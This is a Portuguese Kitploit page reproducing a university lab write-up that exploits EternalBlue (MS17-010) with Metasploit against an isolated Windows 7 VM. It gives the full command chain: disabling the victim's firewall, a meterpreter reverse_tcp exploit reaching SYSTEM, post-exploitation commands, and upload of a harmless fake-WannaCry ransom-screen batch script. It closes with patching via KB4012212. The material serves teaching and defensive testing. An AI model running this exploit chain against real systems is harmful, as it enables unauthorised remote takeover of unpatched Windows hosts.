Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — Laboratório de cybersegurança demonstrando exploração do CVE-2017-0144 (EternalBlue) usando Metasploit contra uma VM Windows 7 vulnerável, alcançando acesso de nível SYSTEM via Meterpreter. Inclui cadeia de ataque completa, pós-exploração e mitigação por meio do patch MS17-010, testado em um ambiente de laboratório ético isolado. | Kitploit
Ferramentas/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoAnálise de MalwareTestes de PenetraçãoComando e ControleAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Resposta a Incidentes
Labs e Prática
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

Ver Repositório
há 3 mesesAinda não revisado

Sobre

Laboratório de cybersegurança demonstrando exploração do CVE-2017-0144 (EternalBlue) usando Metasploit contra uma VM Windows 7 vulnerável, alcançando acesso de nível SYSTEM via Meterpreter. Inclui cadeia de ataque completa, pós-exploração e mitigação por meio do patch MS17-010, testado em um ambiente de laboratório ético isolado.

Compartilhar

Demonstração do Exploit EternalBlue (MS17-010)

Laboratório de cibersegurança que demonstra a exploração de CVE-2017-0144 (EternalBlue) usando Metasploit contra um sistema Windows 7 vulnerável, obtendo acesso de nível SYSTEM via Meterpreter.

Este projeto também simula um ataque de ransomware no estilo WannaCry (DEMONSTRAÇÃO SEGURA) e demonstra a mitigação usando o patch de segurança MS17-010.


Informações do Módulo

Módulo: CSCM828 Security Vulnerabilities and Penetration Testing

Estudantes:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Universidade: Swansea University


Recursos e Downloads

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Atualização de Segurança do Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Download de Máquinas Virtuais)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. Visão Geral

Este laboratório demonstra:

  • Exploração remota da vulnerabilidade SMB (MS17-010)
  • Acesso ao nível do kernel via EternalBlue
  • Estabelecimento de sessão Meterpreter
  • Técnicas de pós-exploração
  • Simulação de ransomware no estilo WannaCry (segura)
  • Mitigação por meio de patches

2. Ambiente do Laboratório

Requisitos

  • VMware Workstation / VirtualBox
  • Mínimo de 8GB de RAM

Máquina do Atacante

  • Kali Linux
  • Metasploit Framework

Máquina da Vítima

  • Windows 7 SP1 x64 (sem patch)

Rede

  • Host-only / NAT (ambiente isolado)
  • Garanta que ambas as máquinas possam se comunicar

⚠️ Este laboratório deve ser conduzido em um ambiente totalmente isolado.


3. Configuração da Vítima (Windows 7)

Execute no Prompt de Comando como Administrador:

Desativar Firewall

root@kitploit:~
netsh advfirewall set allprofiles state off

Verificar Porta SMB

root@kitploit:~
netstat -an | findstr :445

Desativar Atualizações (para estabilidade do laboratório)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. Configuração do Atacante (Kali Linux)

Verificar Conectividade

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. Etapas de Exploração

Passo 1: Escanear Alvo

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Esperado:

  • O host está VULNERÁVEL

Passo 2: Executar Exploit

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Passo 3: Confirmar Acesso

root@kitploit:~
meterpreter > getuid

Esperado:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. Pós-Exploração

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

Migração Estável

root@kitploit:~
ps
migrate <explorer.exe PID>

7. Simulação do WannaCry (DEMONSTRAÇÃO SEGURA)

Criar Payload (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

Upload e Execução

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. Mitigação (Demonstração do Patch)

Passo 1: Baixar o Patch

  • Visite: https://www.catalog.update.microsoft.com/
  • Pesquise: KB4012212 Windows 7 x64
  • Baixe o arquivo .msu

Passo 2: Instalar o Patch

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

Passo 3: Reiniciar

root@kitploit:~
shutdown /r /t 0

Passo 4: Verificar o Patch

root@kitploit:~
systeminfo | findstr KB4012212

Passo 5: Reexecutar o Exploit

Esperado:

  • O exploit falha
  • Nenhuma sessão Meterpreter

Passo 6: Verificar com Nmap

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Esperado:

  • NÃO VULNERÁVEL

9. Solução de Problemas

ProblemaSolução
O exploit falhaVerifique a conectividade
Nenhuma sessãoDesative o firewall
A sessão morreTente o exploit novamente
Nenhuma janela visívelMigre para explorer.exe

10. Considerações Éticas

Este projeto é conduzido:

  • Somente em máquinas de laboratório controladas
  • Em uma rede totalmente isolada
  • Apenas para fins educacionais

O uso não autorizado viola:

  • UK Computer Misuse Act 1990

11. Conclusão

Este laboratório demonstra:

  • Exploração de SMB no mundo real usando EternalBlue
  • Comprometimento do Windows 7 ao nível SYSTEM
  • Simulação de ataque de ransomware (segura)
  • Importância da aplicação de patches em tempo hábil
Baixar ferramenta